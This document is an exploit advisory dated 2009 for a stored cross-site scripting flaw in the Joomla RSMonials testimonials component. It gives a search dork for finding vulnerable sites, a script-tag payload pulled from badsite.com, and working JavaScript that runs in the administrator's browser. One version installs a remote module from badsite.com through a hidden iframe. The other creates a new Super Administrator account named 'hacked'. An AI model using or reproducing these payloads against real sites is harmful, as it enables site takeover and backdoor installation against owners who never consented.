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joomlarsmonials-xss.txt

Posted on 22 April 2009

/* RSMonials XSS Exploit http://www.rswebsols.com/downloads/category/14-download-rsmonials-all?download=23%3Adownload-rsmonials-component Google Dork: allinurl:option=com_rsmonials Anything entered into the form gets rendered as HTML, so you can add tags as long as they don't include quotes (magic quotes eats them, if it's on). This component ships with settings that prevent posting by default, but the administrator page for the testimonials renders your script in its entirety. Proof of Concept 1: Remote file upload Visit http://target.com/index.php?option=com_rsmonials and post a comment. At the end of your glowing comment about how awesome the site is, attach this: <script src=http://badsite.com/evil.js></script> Now, when your admin goes to the com_rsmonials "Testimonials" page, your script will execute. In this example, a hidden iframe loads up the install page and installs a 'custom' module. */ var exploited = false; var iframe = document.createElement( 'iframe' ); var reg = new RegExp( 'administrator' ); if( reg.test( location.href ) ) { iframe.src = 'index.php?option=com_installer'; iframe.setStyle( 'display', 'none' ); document.body.appendChild( iframe ); iframe.addEvent( 'load', exploit ); } function exploit( e ) { if( exploited != true ) { var doc = e.target.contentDocument; if( !doc ) return; var inp = doc.getElementById( 'install_url' ); inp.value = 'http://badsite.com/exploit.zip'; var b = inp.parentNode.getElementsByTagName( 'input' )[1]; b.onclick(); exploited = true; } } /* Proof of Concept 2: New Super Administrator Here's a drop-in replacement for the 'exploit' function above: function exploit( e ) { if( exploited != true ) { var newForm = false; var doc = e.target.contentDocument; if( !doc ) return; var nb = doc.getElementsByTagName( 'a' ); if( !nb ) return; var i = 0; for( ; i<nb.length; i++ ) { if( nb[i].parentNode.id == 'toolbar-new' ) { nb[i].onclick(); } else if( nb[i].parentNode.id == 'toolbar-save' ) { doc.getElementById( 'name' ).value = 'hacked'; doc.getElementById( 'username' ).value = 'hacked'; doc.getElementById( 'email' ).value = 'your@freemail.com'; doc.getElementById( 'password' ).value = 'password'; doc.getElementById( 'password2' ).value = 'password'; var g = doc.getElementById( 'gid' ); g.selectedIndex = g.options.length - 1; nb[i].onclick(); exploited = true; } } } } If the admin is a Super Admin, then you could be too... just remember to watch your freemail account for Joomla's account notification! */ /* jdc 2009 */

 

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